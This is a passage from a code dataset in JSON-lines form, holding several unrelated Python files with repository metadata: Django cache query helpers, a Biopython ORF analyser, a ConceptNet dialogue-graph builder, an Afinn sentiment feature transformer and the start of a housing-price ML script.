filter_query(self, **kwargs):\n \"\"\" Find the queryset_cache_class for given params\n and return it's object for given params.\n \"\"\"\n key_fields = self.get_key_fields(kwargs)\n if key_fields in self.simple_queryset_cache_classes:\n queryset_cache_class = self.simple_queryset_cache_classes[key_fields]\n return queryset_cache_class(**kwargs)\n raise CacheNotRegistered(self.model, key_fields)\n\n def filter_async(self, **kwargs):\n \"\"\" await counterpart of filter method.\n \"\"\"\n return self.filter_query(**kwargs).resolve_async()\n\n def filter_cache_class_for(self, *args):\n \"\"\" Find the queryset_cache_class for given params\n and return it's cache class.\n \"\"\"\n key_fields = self.get_key_fields(args)\n if key_fields in self.simple_queryset_cache_classes:\n queryset_cache_class = self.simple_queryset_cache_classes[key_fields]\n return queryset_cache_class\n raise CacheNotRegistered(self.model, args)\n\n def get_or_404(self, **kwargs):\n \"\"\" If the get result is not found raises 404.\n \"\"\"\n try:\n return self.get(**kwargs)\n except self.model.DoesNotExist:\n raise Http404('No %s matches the given query.' 
%\n self.model._meta.object_name)\n\n def get_or_none(self, **kwargs):\n \"\"\" If the get result is not found returns None.\n \"\"\"\n try:\n return self.get(**kwargs)\n except self.model.DoesNotExist:\n return None\n", "repo_name": "HackerEarth/django-flash", "sub_path": "flash/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 58925, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.core.cache.caches", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.get_models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.apps.apps.get_models", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.apps.apps", "line_number": 26, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.generic.GenericForeignKey", "line_number": 41, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 44, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 45, "usage_type": "name"}, {"api_name": "django.core.cache.get_cache", "line_number": 53, "usage_type": "call"}, {"api_name": "flash.settings.CACHE_NAME", "line_number": 53, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 53, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 78, "usage_type": "call"}, {"api_name": "six.python_2_unicode_compatible", "line_number": 87, "usage_type": "attribute"}, {"api_name": "six.with_metaclass", "line_number": 128, "usage_type": "call"}, {"api_name": "abc.ABCMeta", "line_number": 128, "usage_type": "argument"}, {"api_name": "flash.settings.DEFAULT_TIMEOUT", "line_number": 144, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 144, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 162, "usage_type": "name"}, {"api_name": "flash.models.CacheDynamicVersion.objects.get_version_of", "line_number": 171, "usage_type": "call"}, {"api_name": "flash.models.CacheDynamicVersion.objects", "line_number": 171, "usage_type": "attribute"}, {"api_name": "flash.models.CacheDynamicVersion", "line_number": 171, "usage_type": "name"}, {"api_name": "flash.settings.WRITE_LOCK_TIMEOUT", "line_number": 194, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 194, "usage_type": "name"}, {"api_name": "flash.option.Some", "line_number": 237, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 239, "usage_type": "name"}, {"api_name": "time.time", "line_number": 269, "usage_type": "call"}, {"api_name": "time.time", "line_number": 323, "usage_type": "call"}, {"api_name": "time.time", "line_number": 365, "usage_type": "call"}, {"api_name": "distutils.version.StrictVersion", "line_number": 371, "usage_type": "call"}, {"api_name": "django.get_version", "line_number": 371, "usage_type": "call"}, {"api_name": "django.db.transaction.commit_unless_managed", "line_number": 372, "usage_type": "call"}, {"api_name": "django.db.transaction", "line_number": 372, "usage_type": "name"}, {"api_name": "flash.settings.DONT_USE_CACHE", "line_number": 402, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 402, "usage_type": "name"}, {"api_name": "flash.settings.DONT_USE_CACHE", "line_number": 415, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 415, "usage_type": "name"}, {"api_name": "flash.settings.DONT_USE_CACHE", 
"line_number": 426, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 426, "usage_type": "name"}, {"api_name": "thread_context.dataloader_context.DataLoadersFactory.get_loader_for", "line_number": 437, "usage_type": "call"}, {"api_name": "thread_context.dataloader_context.DataLoadersFactory", "line_number": 437, "usage_type": "name"}, {"api_name": "loader.FlashCacheLoader", "line_number": 437, "usage_type": "name"}, {"api_name": "loader.load", "line_number": 438, "usage_type": "call"}, {"api_name": "abc.ABCMeta", "line_number": 501, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 507, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 508, "usage_type": "call"}, {"api_name": "six.with_metaclass", "line_number": 533, "usage_type": "call"}, {"api_name": "abc.abstractproperty", "line_number": 546, "usage_type": "name"}, {"api_name": "abc.abstractproperty", "line_number": 553, "usage_type": "name"}, {"api_name": "flash.settings.db_discoverer_func", "line_number": 558, "usage_type": "call"}, {"api_name": "flash.settings", "line_number": 558, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 573, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 577, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 621, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 622, "usage_type": "argument"}, {"api_name": "django.contrib.contenttypes.models.ContentType.objects_cache.get_for_model", "line_number": 628, "usage_type": "call"}, {"api_name": "django.contrib.contenttypes.models.ContentType.objects_cache", "line_number": 628, "usage_type": "attribute"}, {"api_name": "django.contrib.contenttypes.models.ContentType", "line_number": 628, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 640, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 640, "usage_type": "name"}, {"api_name": "flash.utils.memcache_key_escape", "line_number": 656, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 663, "usage_type": "call"}, {"api_name": "six.get_unbound_function", "line_number": 673, "usage_type": "call"}, {"api_name": "six.get_unbound_function", "line_number": 674, "usage_type": "call"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 756, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 757, "usage_type": "argument"}, {"api_name": "six.with_metaclass", "line_number": 781, "usage_type": "call"}, {"api_name": "abc.abstractproperty", "line_number": 795, "usage_type": "name"}, {"api_name": "flash.utils.flash_properties", "line_number": 866, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 883, "usage_type": "call"}, {"api_name": "six.with_metaclass", "line_number": 1057, "usage_type": "call"}, {"api_name": "abc.abstractproperty", "line_number": 1073, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 1101, "usage_type": "call"}, {"api_name": "six.get_unbound_function", "line_number": 1109, "usage_type": "call"}, {"api_name": "six.get_unbound_function", "line_number": 1110, "usage_type": "call"}, {"api_name": "six.with_metaclass", "line_number": 1117, "usage_type": "call"}, {"api_name": "abc.abstractproperty", "line_number": 1132, "usage_type": "name"}, {"api_name": 
"six.with_metaclass", "line_number": 1188, "usage_type": "call"}, {"api_name": "abc.abstractproperty", "line_number": 1208, "usage_type": "name"}, {"api_name": "abc.abstractproperty", "line_number": 1231, "usage_type": "name"}, {"api_name": "six.with_metaclass", "line_number": 1247, "usage_type": "call"}, {"api_name": "abc.ABCMeta", "line_number": 1247, "usage_type": "argument"}, {"api_name": "django.db.models.fields.related_descriptors.ForwardManyToOneDescriptor", "line_number": 1253, "usage_type": "name"}, {"api_name": "abc.ABCMeta", "line_number": 1282, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 1286, "usage_type": "call"}, {"api_name": "django.db.models.get_models", "line_number": 1375, "usage_type": "call"}, {"api_name": "six.with_metaclass", "line_number": 1421, "usage_type": "call"}, {"api_name": "flash.settings.DEFAULT_TIMEOUT", "line_number": 1424, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 1424, "usage_type": "name"}, {"api_name": "abc.abstractproperty", "line_number": 1426, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 1489, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 1490, "usage_type": "argument"}, {"api_name": "loader.object_or_none", "line_number": 1526, "usage_type": "call"}, {"api_name": "loader.object_or_404", "line_number": 1530, "usage_type": "call"}, {"api_name": "django.http.Http404", "line_number": 1593, "usage_type": "call"}]} +{"seq_id": "6290291944", "text": "from Bio.Alphabet import DNAAlphabet\nfrom Bio.Data.CodonTable import CodonTable, TranslationError, ambiguous_dna_by_id\nfrom Bio.Seq import Seq\nfrom Bio.SeqFeature import SeqFeature, ExactPosition\nfrom Bio.SeqRecord import SeqRecord\n\nfrom src.Base import Base\n\n__author__ = \"ronmor\"\n\n\ndef _cleave_after_stop_codon(nucleotide_seq, table):\n \"\"\"\n :param nucleotide_seq: The DNA sequence to cleave\n :type nucleotide_seq: Seq\n :param table:\n :type table: CodonTable\n :return:\n :rtype: list[Seq]\n :raises: ValueError if not a nucleotide sequence\n \"\"\"\n _check_if_nucleotide_sequence(nucleotide_seq)\n nucleotide_seq = nucleotide_seq.upper()\n stop_codons = table.stop_codons\n cleaved_at_stop = []\n codon = \"\"\n after_stop_index = 0\n for index, letter in enumerate(nucleotide_seq):\n codon += letter\n if codon in stop_codons:\n cleaved_at_stop.append(nucleotide_seq[after_stop_index:index + 1])\n after_stop_index = index + 1\n if len(codon) == 3:\n codon = \"\"\n return cleaved_at_stop\n\n\ndef _check_if_nucleotide_sequence(nucleotide_sequence):\n if not isinstance(nucleotide_sequence, Seq):\n raise ValueError(\"Expected a sequence, got %s instead\" % type(nucleotide_sequence))\n elif not isinstance(nucleotide_sequence.alphabet, DNAAlphabet):\n raise ValueError(\"Expected DNA alphabet, found %s instead\" % type(nucleotide_sequence.alphabet))\n\n\nclass DownstreamAnalyzer(object):\n def __init__(self, downstream_sequence, coding_sequence_start_index, genbank_file, is_complementary=False):\n \"\"\"\n :param downstream_sequence: The sequence downstream of the a gene which we want to analyze.\n :type downstream_sequence: Seq\n :param coding_sequence_start_index: The start index of the gene in the genbank-file features list.\n :type coding_sequence_start_index: int\n :param genbank_file:\n :type genbank_file: SeqRecord\n :param is_complementary:\n :type is_complementary: bool\n :raise: ValueError if the object 
doesn't hold a genbank documentation or if the genbank file isn't DNA\n \"\"\"\n self.__downstream_seq = downstream_sequence\n self.__start_index = coding_sequence_start_index\n self. __is_complementing = is_complementary\n if genbank_file is not None:\n if not isinstance(genbank_file, SeqRecord):\n raise ValueError(\n \"genbank file type expected to be of type SeqRecord, found %s instead\" % type(self.__genbank_file))\n _check_if_nucleotide_sequence(genbank_file.seq)\n self.__genbank_file = genbank_file\n\n @property\n def downstream_seq(self):\n return self.__downstream_seq\n\n @property\n def is_complementing(self):\n return self.__is_complementing\n\n def find_possible_proteins_in_downstream_sequence(self, table_id=11):\n \"\"\"\n For the downstream sequence, get all possible CDSs and return their matching proteins.\n ORF is searched for the entire sequence and not for the complement strand (3 total).\n Use only for sequences known not to have introns!\n :param table_id: ID of translation table as appears on https://www.ncbi.nlm.nih.gov/Taxonomy/Utils/wprintgc.cgi\n Defaults to 11.\n :type table_id: int\n :return: ORF index (0-2) to list of proteins (type Seq)\n :rtype: dict[int, list[Seq]]\n \"\"\"\n table = ambiguous_dna_by_id[table_id]\n orfs = self._find_possible_orfs_on_positive_strand(self.__downstream_seq)\n possible_proteins = {}\n for orf_num, orf in enumerate(orfs):\n cleaved_frame = _cleave_after_stop_codon(orf, table)\n for possible_cds in cleaved_frame:\n try:\n possible_protein = possible_cds.translate(table=table, cds=True)\n except TranslationError:\n continue\n else:\n possible_proteins[orf_num] = possible_protein\n return possible_proteins\n\n @staticmethod\n def _find_possible_orfs_on_positive_strand(nucleotide_sequence):\n \"\"\"\n Only find the orfs in the downstream sequence given, WITHOUT the complementing strand.\n :param nucleotide_sequence: the sequence to find the\n :rtype: [Seq]\n :return:\n \"\"\"\n for frame in range(3):\n length = 3 * ((len(nucleotide_sequence) - frame) // 3) # Multiple of three\n yield nucleotide_sequence[frame:frame + length]\n\n def _find_next_gene_index_in_genbank(self):\n \"\"\"\n :return:\n :rtype: int\n \"\"\"\n feature = None\n for feature in self.__genbank_file.features:\n if feature.location.start >= self.__start_index:\n break\n index = self.__genbank_file.features.index(feature) - 1 if feature else None\n if self.__is_complementing:\n return index\n elif index is not None:\n try:\n while self.__start_index < self.__genbank_file.features[index].location.start:\n index += 1\n # End of list\n except IndexError:\n index -= 1\n return index\n\n def generate_downstream_cdss(self):\n \"\"\"\n find all the features (usually CDSs) downstream of the gene, going towards the 3' end in both strands.\n :return:\n \"\"\"\n next_feature_index = self._find_next_gene_index_in_genbank()\n if next_feature_index is None:\n raise ValueError(\"Could not find a feature downstream\")\n downstream_feature_index = next_feature_index\n while abs(self.__genbank_file.features[downstream_feature_index].location.start -\n self.__genbank_file.features[next_feature_index].location.start) <= len(self.__downstream_seq):\n if not (self.__genbank_file.features[downstream_feature_index].strand == Base.COMPLEMENT\n and not self.__is_complementing):\n feature_to_yield = self.__genbank_file.features[downstream_feature_index]\n if hasattr(feature_to_yield, 'type') and feature_to_yield.type == 'CDS' and \\\n isinstance(feature_to_yield.location.start, ExactPosition) and 
\\\n isinstance(feature_to_yield.location.end, ExactPosition):\n yield feature_to_yield\n if self.__is_complementing:\n downstream_feature_index -= 1\n else:\n downstream_feature_index += 1\n if downstream_feature_index < 0 or downstream_feature_index > len(self.__genbank_file.features)-1:\n break\n\n def translate_feature(self, feature, table=11):\n \"\"\"\n :param feature: a feature of a genome. has to be RNA or DNA\n :type feature: SeqFeature\n :param table: The table used for translation: https://www.ncbi.nlm.nih.gov/Taxonomy/Utils/wprintgc.cgi\n :type table: int\n :rtype: Seq\n \"\"\"\n is_cds = True if feature.type == 'CDS' else False\n return feature.extract(self.__genbank_file).seq.translate(table=table, cds=is_cds)\n\n def __eq__(self, other):\n if not isinstance(other, type(self)):\n raise ValueError(\"Expected instance of %s got %s instead\" % (type(self), type(other)))\n return self.__downstream_seq == other.downstream_seq\n", "repo_name": "ronmoran/weizmann-aimr", "sub_path": "src/DownstreamAnalyzer.py", "file_name": "DownstreamAnalyzer.py", "file_ext": "py", "file_size_in_byte": 7434, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "Bio.Seq.Seq", "line_number": 39, "usage_type": "argument"}, {"api_name": "Bio.Alphabet.DNAAlphabet", "line_number": 41, "usage_type": "argument"}, {"api_name": "Bio.SeqRecord.SeqRecord", "line_number": 62, "usage_type": "argument"}, {"api_name": "Bio.Data.CodonTable.ambiguous_dna_by_id", "line_number": 87, "usage_type": "name"}, {"api_name": "Bio.Data.CodonTable.TranslationError", "line_number": 95, "usage_type": "name"}, {"api_name": "src.Base.Base.COMPLEMENT", "line_number": 145, "usage_type": "attribute"}, {"api_name": "src.Base.Base", "line_number": 145, "usage_type": "name"}, {"api_name": "Bio.SeqFeature.ExactPosition", "line_number": 149, "usage_type": "argument"}, {"api_name": "Bio.SeqFeature.ExactPosition", "line_number": 150, "usage_type": "argument"}]} +{"seq_id": "8258637633", "text": "import torch\nimport numpy as np\nimport os\nimport pickle\n\nfrom tqdm import tqdm\nfrom datasets import load_dataset\nfrom sentence_transformers import SentenceTransformer\n\nfrom message_enritcher.trie_structure import Trie\nfrom message_enritcher.knowledge_extractor import KnowledgeExtractor\n\nclass GraphBuilder:\n def __init__(self,\n path='/data/conceptNet_embs',\n save_path='datasets/',\n emb_file_name='conceptnet_embs',\n data_file_name='dialogs_data'):\n self.path = path\n self.save_path = save_path\n self.data_file_name = data_file_name\n self.emb_file_name = emb_file_name\n self.embeddings = None\n self.trie = None\n self.dataset = None\n self.conceptNet = None\n self.start_index = None\n self.set_dataset()\n self.set_embeddings()\n self.set_trie()\n self.set_start_index()\n self.preprocess_dialog_data()\n\n def set_dataset(self):\n print(\"load and save dataset\")\n dataset = load_dataset(\"daily_dialog\")\n self.train_dataset = dataset['train']['dialog']\n self.test_dataset = dataset['test']['dialog']\n self.val_dataset = dataset['validation']['dialog']\n conceptNet = load_dataset(\"peandrew/conceptnet_en_nomalized\")\n self.conceptNet = conceptNet['train']\n\n def preprocess_dialog_data(self):\n for i, conv in enumerate(self.train_dataset):\n for j, msg in enumerate(conv):\n self.train_dataset[i][j] = msg.strip()\n self.train_dataset = [data[:10] for data in self.train_dataset if len(data) > 4]\n\n for i, conv in enumerate(self.test_dataset):\n for j, msg in 
enumerate(conv):\n self.test_dataset[i][j] = msg.strip()\n self.test_dataset = [data[:10] for data in self.test_dataset if len(data) > 4]\n\n for i, conv in enumerate(self.val_dataset):\n for j, msg in enumerate(conv):\n self.val_dataset[i][j] = msg.strip()\n self.val_dataset = [data[:10] for data in self.val_dataset if len(data) > 4]\n\n def set_embeddings(self):\n print(\"load and save embeddings\")\n self.embeddings = self.get_embeddings()\n\n def set_trie(self):\n print(\"build trie datastructure\")\n self.trie = Trie()\n self.trie.insert_dataset(self.conceptNet, self.get_embeddings())\n del self.conceptNet\n del self.embeddings\n\n def get_embeddings(self, numpy_array=True):\n try:\n embeddings = self.load_tensor(file_name=self.emb_file_name, path=self.path)\n except:\n print(\"no saved embeddings could be found\")\n dataset = load_dataset(\"peandrew/conceptnet_en_nomalized\")\n model = SentenceTransformer('all-MiniLM-L6-v2')\n embeddings = model.encode(dataset['train']['arg2'])\n self.save_tensor(embeddings, file_name=self.emb_file_name, path=self.path)\n if numpy_array:\n embeddings = embeddings.cpu().detach().numpy()\n return embeddings\n\n def load_tensor(self, file_name, path):\n f = os.path.join(path, f\"{file_name}.pt\")\n return torch.load(f)\n\n def save_tensor(self, tensor, file_name, path):\n if not torch.is_tensor(tensor):\n tensor = torch.from_numpy(tensor)\n f = os.path.join(path, f\"{file_name}.pt\")\n torch.save(tensor, f)\n\n def set_start_index(self):\n print(\"load index\")\n file_list = os.listdir(self.path)\n max_end = 0\n try:\n for file_name in file_list:\n if self.data_file_name in file_name:\n f = file_name.split('_')[-1]\n start, end = f.split('-')\n end = int(end[:-2])\n max_end = max(end, max_end)\n except:\n print(f\"could not find a file that contains this {self.data_file_name} string\")\n self.start_index = max_end\n\n def from_dialog_to_graph(self,\n start_index,\n n_hops=4,\n save_data=False,\n save_steps=100,\n coll_nodes_hop=100,\n num_persons=2):\n\n save_folder_name = f'dd_hop{n_hops}_k{coll_nodes_hop}/'\n\n all_person_list = ['Max', 'Eva', 'Mareike', 'Sebastian', 'Holga']\n dialogs = []\n new_data = True\n datasets = [0, 1, 2]\n\n for data_idx in datasets:\n if data_idx == 0:\n dataset = self.test_dataset\n folder_name = \"test/data/raw/\"\n data_filename = 'test_data'\n elif data_idx == 1:\n dataset = self.val_dataset\n folder_name = \"val/data/raw/\"\n data_filename = 'val_data'\n else:\n dataset = self.train_dataset\n folder_name = \"train/data/raw/\"\n data_filename = 'train_data'\n\n end_index = len(dataset)\n start = start_index\n\n for index, conv in tqdm(enumerate(dataset[start_index:end_index], start=start_index),\n total=end_index - start_index):\n new_data = True\n person_list = np.char.array([all_person_list[person % num_persons] for person in range(len(conv))])\n person_msg_relations = np.char.array(['speak by' for _ in range(len(conv))])\n person_msg_edges = np.char.array([person_list, conv, person_msg_relations]).T\n\n message_subgrphs = []\n for i, msg in enumerate(conv):\n message_edges = {}\n msg_sub = KnowledgeExtractor(msg, self.trie, i % num_persons)\n for hop in range(n_hops):\n ex_nodes = msg_sub.new_hop(k=coll_nodes_hop)\n if ex_nodes == 0:\n break\n\n message_edges['person_msg'] = person_msg_edges[i]\n message_edges['msg_knowledge'] = msg_sub.data['msg_knowledge_edges']\n message_edges['knowledge_knowledge'] = msg_sub.graph_edges\n\n message_subgrphs.append(message_edges)\n\n dialogs.append(message_subgrphs)\n if 
save_data:\n if len(dialogs) >= save_steps:\n pickle.dump(dialogs, open(\n f\"{self.save_path + save_folder_name + folder_name}{data_filename}_{start}-{index}.p\",\n \"wb\"))\n start = index + 1\n del dialogs\n dialogs = []\n new_data = False\n if save_data and new_data:\n pickle.dump(dialogs,\n open(f\"{self.save_path + save_folder_name + folder_name}{data_filename}_{start}-{index}.p\",\n \"wb\"))\n del dialogs\n dialogs = []\n new_data = False\n print(\n f\"save file: \\t {data_filename}_{start}-{index}.p to: \\t {self.save_path + save_folder_name + folder_name}{data_filename}_{start}-{index}.p\")", "repo_name": "ShiraTUB/ActiveDoc", "sub_path": "DiaTransNet/data/graph_builder.py", "file_name": "graph_builder.py", "file_ext": "py", "file_size_in_byte": 7270, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datasets.load_dataset", "line_number": 36, "usage_type": "call"}, {"api_name": "datasets.load_dataset", "line_number": 40, "usage_type": "call"}, {"api_name": "message_enritcher.trie_structure.Trie", "line_number": 65, "usage_type": "call"}, {"api_name": "datasets.load_dataset", "line_number": 75, "usage_type": "call"}, {"api_name": "sentence_transformers.SentenceTransformer", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.is_tensor", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 91, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 95, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.char.array", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.char", "line_number": 143, "usage_type": "attribute"}, {"api_name": "numpy.char.array", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.char", "line_number": 144, "usage_type": "attribute"}, {"api_name": "numpy.char.array", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.char", "line_number": 145, "usage_type": "attribute"}, {"api_name": "message_enritcher.knowledge_extractor.KnowledgeExtractor", "line_number": 150, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 165, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 173, "usage_type": "call"}]} +{"seq_id": "3665822992", "text": "from sklearn.base import TransformerMixin, BaseEstimator\nfrom sklearn.preprocessing import MinMaxScaler\nfrom nltk.tokenize import word_tokenize\nfrom utils.Parameters import Parameters\nimport numpy as np\nfrom pymongo import MongoClient\nparameters = Parameters()\nfrom afinn import Afinn\n\n\nafinn = Afinn()\n\n\"\"\"\nconfigs:\n0- No feature\n1- sentence polarity TODO:(needs parameterization )\n2- num_polarity_words / num_neutral_words\n3- mean_pos mean_neg\n4- median_pos median_neg\n\"\"\"\n\n\nclass AfinnTransformer(TransformerMixin, BaseEstimator):\n features = {'afinn_value': 0, 'polar_neutral_ratio': 0 }\n\n def __init__(self, featureSetConfiguration = 1 ):\n self.featureSetConfiguration = featureSetConfiguration\n\n def transform(self, X, 
**transform_params):\n\n mongoClient = MongoClient('localhost', 27017)\n ffCorpus = mongoClient.FACTFEELCorpus\n temp = [\n [0 for f in sorted(AfinnTransformer.features.keys())]\n for s in X\n ]\n # document_score\n if self.featureSetConfiguration == 1:\n documentCollection = ffCorpus.documents\n temp = []\n for document in X:\n features_to_set = AfinnTransformer.features\n # current learning instance info from database\n currentDocument= documentCollection.find_one({'document_id': document })\n raw_documet = currentDocument['raw'].lower()\n b = afinn.score(raw_documet)\n features_to_set['afinn_value'] = b\n\n temp.append([features_to_set[key] for key in sorted(features_to_set.keys())])\n min_max_scaler = MinMaxScaler()\n temp = min_max_scaler.fit_transform(temp)\n # num_polarity_words / num_neutral_words\n elif self.featureSetConfiguration == 2:\n documentCollection = ffCorpus.documents\n temp = []\n for document in X:\n features_to_set = AfinnTransformer.features\n # current learning instance info from database\n currentDocument = documentCollection.find_one({'document_id': document})\n raw_document = currentDocument['raw'].lower()\n\n words = word_tokenize(raw_document)\n scores_list = [afinn.score(word) for word in words]\n\n neutral = [zero for zero in scores_list if zero==0]\n polar = [pol for pol in scores_list if pol != 0]\n\n if(neutral !=[] and polar!=[]):\n b = len(polar)/len(neutral)\n else:\n b = 0\n features_to_set['polar_neutral_ratio'] = b\n temp.append([features_to_set[key] for key in sorted(features_to_set.keys())])\n # mean_pos mean_neg\n elif self.featureSetConfiguration == 3:\n documentCollection = ffCorpus.documents\n temp = []\n for document in X:\n features_to_set = AfinnTransformer.features\n # current learning instance info from database\n currentDocument= documentCollection.find_one({'document_id': document })\n raw_document = currentDocument['raw'].lower()\n\n words = word_tokenize(raw_document)\n scores_list = [afinn.score(word) for word in words]\n\n neutral = [zero for zero in scores_list if zero==0]\n polar = [pol for pol in scores_list if pol != 0]\n\n if(neutral !=[] and polar!=[]):\n b_r = len(polar)/len(neutral)\n else:\n b_r=0\n\n b_a = afinn.score(raw_document)\n features_to_set['afinn_value'] = b_a\n features_to_set['polar_neutral_ratio'] = b_r\n temp.append([features_to_set[key] for key in sorted(features_to_set.keys())])\n\n min_max_scaler = MinMaxScaler()\n temp = min_max_scaler.fit_transform(temp)\n # median_pos median_neg\n elif self.featureSetConfiguration == 4:\n documentCollection = ffCorpus.documents\n temp = []\n for document in X:\n features_to_set = {'polar/neutral': 0}\n\n mongoClient.close()\n features = np.array(temp)\n #print('AfinnTransformer:' , self.featureSetConfiguration,' ### X:',len(X),'len(features):',len(features))\n return features\n\n def fit(self, X, y=None, **fit_params):\n return self\n\n ## names are related to featureSetConfiguration\n def get_feature_names(self):\n return sorted(AfinnTransformer.features.keys())\n\n\n\n\n\n\n", "repo_name": "ei08047/ArgTasks", "sub_path": "ArgMine/ffd_en/Transformers/AfinnTransformer.py", "file_name": "AfinnTransformer.py", "file_ext": "py", "file_size_in_byte": 4616, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.Parameters.Parameters", "line_number": 7, "usage_type": "call"}, {"api_name": "afinn.Afinn", "line_number": 11, "usage_type": "call"}, {"api_name": "sklearn.base.TransformerMixin", 
"line_number": 23, "usage_type": "name"}, {"api_name": "sklearn.base.BaseEstimator", "line_number": 23, "usage_type": "name"}, {"api_name": "pymongo.MongoClient", "line_number": 31, "usage_type": "call"}, {"api_name": "afinn.score", "line_number": 46, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 50, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 62, "usage_type": "call"}, {"api_name": "afinn.score", "line_number": 63, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 84, "usage_type": "call"}, {"api_name": "afinn.score", "line_number": 85, "usage_type": "call"}, {"api_name": "afinn.score", "line_number": 95, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 110, "usage_type": "call"}]} +{"seq_id": "18815876090", "text": "from __future__ import division, print_function, unicode_literals\n\nimport os\nimport tarfile\nimport warnings\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom six.moves import urllib\nfrom future_encoders import ColumnTransformer, OneHotEncoder\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.model_selection import StratifiedShuffleSplit, train_test_split, cross_val_score, GridSearchCV\nfrom sklearn.pipeline import FeatureUnion, Pipeline\nfrom sklearn.preprocessing import LabelEncoder, LabelBinarizer, StandardScaler, Imputer\nfrom sklearn.ensemble import RandomForestRegressor\n\nwarnings.filterwarnings(action=\"ignore\", message=\"^internal gelsd\")\n\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 2000)\n\nnp.random.seed(42)\n\nplt.rcParams['axes.labelsize'] = 14\nplt.rcParams['xtick.labelsize'] = 12\nplt.rcParams['ytick.labelsize'] = 12\n\nrooms_ix, bedrooms_ix, population_ix, household_ix = 3, 4, 5, 6\n\n\nclass CombinedAttributesAdder(BaseEstimator, TransformerMixin):\n def __init__(self, add_bedrooms_per_room=True): # no *args or **kargs\n self.add_bedrooms_per_room = add_bedrooms_per_room\n\n def fit(self, X, y=None):\n return self # nothing else to do\n\n def transform(self, X, y=None):\n rooms_per_household = X[:, rooms_ix] / X[:, household_ix]\n population_per_household = X[:, population_ix] / X[:, household_ix]\n if self.add_bedrooms_per_room:\n bedrooms_per_room = X[:, bedrooms_ix] / X[:, rooms_ix]\n return np.c_[X, rooms_per_household, population_per_household,\n bedrooms_per_room]\n else:\n return np.c_[X, rooms_per_household, population_per_household]\n\n\n# class DataFrameSelector(BaseEstimator, TransformerMixin):\n# def __init__(self, attribute_names):\n# self.attribute_names = attribute_names\n#\n# def fit(self, X, y=None):\n# return self\n#\n# def transform(self, X):\n# return X[self.attribute_names].values\n\n\nPROJECT_ROOT_DIR = \".\"\nCHAPTER_ID = \"end_to_end_project\"\nIMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, \"images\", CHAPTER_ID)\n\nDOWNLOAD_ROOT = \"https://raw.githubusercontent.com/ageron/handson-ml/master/\"\nHOUSING_PATH = \"datasets/housing\"\nHOUSING_URL = 